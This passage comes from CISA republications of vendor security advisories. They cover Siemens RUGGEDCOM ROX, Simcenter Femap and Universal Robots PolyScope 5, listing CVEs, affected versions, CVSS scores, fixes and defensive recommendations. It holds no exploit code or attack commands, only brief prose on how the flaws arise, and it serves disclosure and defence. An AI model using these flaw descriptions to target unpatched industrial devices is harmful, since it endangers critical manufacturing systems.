https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-34835 In Das U-Boot through 2022.07-rc5, an integer signedness error and resultant stack-based buffer overflow in the "i2c md" command enables the corruption of the return address pointer of the do_i2c_md function. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2023-3019 A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H CVE-2023-27043 The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2024-3447 A heap-based buffer overflow was found in the SDHCI device emulation of QEMU. The bug is triggered when both `s->data_count` and the size of `s->fifo_buffer` are set to 0x200, leading to an out-of-bound access. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H CVE-2024-22365 linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2024-57256 An integer overflow in ext4fs_read_symlink in Das U-Boot before 2025.01-rc1 occurs for zalloc (adding one to an le32 variable) via a crafted ext4 filesystem with an inode size of 0xffffffff, resulting in a malloc of zero and resultant memory overwrite. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H CVE-2024-57258 Integer overflows in memory allocation in Das U-Boot before 2025.01-rc1 occur for a crafted squashfs filesystem via sbrk, via request2size, or because ptrdiff_t is mishandled on x86_64. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H CVE-2025-0395 When the assert() function in the GNU C Library versions 2.13 to 2.40 fails, it does not allocate enough space for the assertion failure message string and size information, which may lead to a buffer overflow if the message string size aligns to page size. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-131 Incorrect Calculation of Buffer Size Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.2 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-3576 A vulnerability in the MIT Kerberos implementation allows GSSAPI-protected messages using RC4-HMAC-MD5 to be spoofed due to weaknesses in the MD5 checksum design. If RC4 is preferred over stronger encryption types, an attacker could exploit MD5 collisions to forge message integrity codes. This may lead to unauthorized message tampering. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-328 Use of Weak Hash Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2025-6020 A flaw was found in linux-pam. The module pam_namespace may use access user-controlled paths without proper protection, allowing local users to elevate their privileges to root via multiple symlink attacks and race conditions. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-7425 A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H CVE-2025-9714 Uncontrolled recursion in XPath evaluation in libxml2 up to and including version 2.9.14 allows a local attacker to cause a stack overflow via crafted expressions. XPath processing functions `xmlXPathRunEval`, `xmlXPathCtxtCompile`, and `xmlXPathEvalExpr` were resetting recursion depth to zero before making potentially recursive calls. When such functions were called recursively this could allow for uncontrolled recursion and lead to a stack overflow. These functions now preserve recursion depth across recursive calls, allowing recursion depth to be controlled. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.2 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-46836 net-tools is a collection of programs that form the base set of the NET-3 networking distribution for the Linux operating system. Inn versions up to and including 2.10, the Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. `get_name()` in `interface.c` copies interface labels from `/proc/net/dev` into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash. The known attack path does not require privilege but also does not provide privilege escalation in this scenario. A patch is available and expected to be part of version 2.20. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H CVE-2025-49794 A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-825 Expired Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2025-49796 A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-577017 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-577017 advisory Legal Notice and Terms of Use

View CSAF Summary Simcenter Femap is affected by heap based buffer overflow vulnerability in Datakit library that could be triggered when the application reads files in IPT format. If a user is tricked to open a malicious file with the affected application, an attacker could leverage the vulnerability to perform remote code execution in the context of the current process. Siemens has released a new version for Simcenter Femap and recommends to update to the latest version. The following versions of Siemens Simcenter Femap are affected: Simcenter Femap vers:intdot/<2512.0003 CVSS Vendor Equipment Vulnerabilities v3 7.8 Siemens Siemens Simcenter Femap Heap-based Buffer Overflow Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-12659 The affected applications contains a memory corruption vulnerability while parsing specially crafted IPT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27349, ZDI-CAN-27389) View CVE Details Affected Products Siemens Simcenter Femap Vendor: Siemens Product Version: Simcenter Femap Product Status: known_affected Remediations Vendor fix Update to V2512.0003 or later version https://support.sw.siemens.com/product/275652363/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Acknowledgments TrendAI Zero Day Initiative reported this vulnerability. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-870926 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-870926 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and execute code. The following versions of Universal Robots Polyscope 5 are affected: Polyscope 5 <5.25.1  CVSS Vendor Equipment Vulnerabilities v3 9.8 Universal Robots Universal Robots Polyscope 5 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Denmark Vulnerabilities Expand All + CVE-2026-8153 OS command injection in Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows unauthenticated attacker to craft commands that will execute code on the robot's OS. View CVE Details Affected Products Universal Robots Polyscope 5 Vendor: Universal Robots Product Version: Universal Robots Polyscope 5: <5.25.1 Product Status: known_affected Remediations Vendor fix Universal Robots has released Polyscope 5 version 5.25.1.For more information, see Universal Robots article: https://www.universal-robots.com/articles/ur/cybersecurity/cve-2026-8153-command-injection-in-the-polyscope-5-dashboard-server/. https://www.universal-robots.com/articles/ur/cybersecurity/cve-2026-8153-command-injection-in-the-polyscope-5-dashboard-server/ Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments Vera Mens of Claroty Team82 reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-05-14 Date Revision Summary 2026-05-14 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox contains an input validation vulnerability in the feature key installation process that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/<2.17.1 RUGGEDCOM ROX MX5000RE vers:intdot/<2.17.1  RUGGEDCOM ROX RX1400 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1500 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1501 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1510 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1511 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1512 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1524 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1536 vers:intdot/<2.17.1  RUGGEDCOM ROX RX5000 vers:intdot/<2.17.1  CVSS Vendor Equipment Vulnerabilities v3 7.5 Siemens Siemens Ruggedcom Rox Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40947 Affected devices do not properly sanitize user-supplied input during the feature key installation process. This could allow an authenticated remote attacker to inject arbitrary commands, resulting in remote code execution with root privileges on the underlying operating system. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability to Siemens. Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-078743 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-078743 advisory Legal Notice and Terms of Use

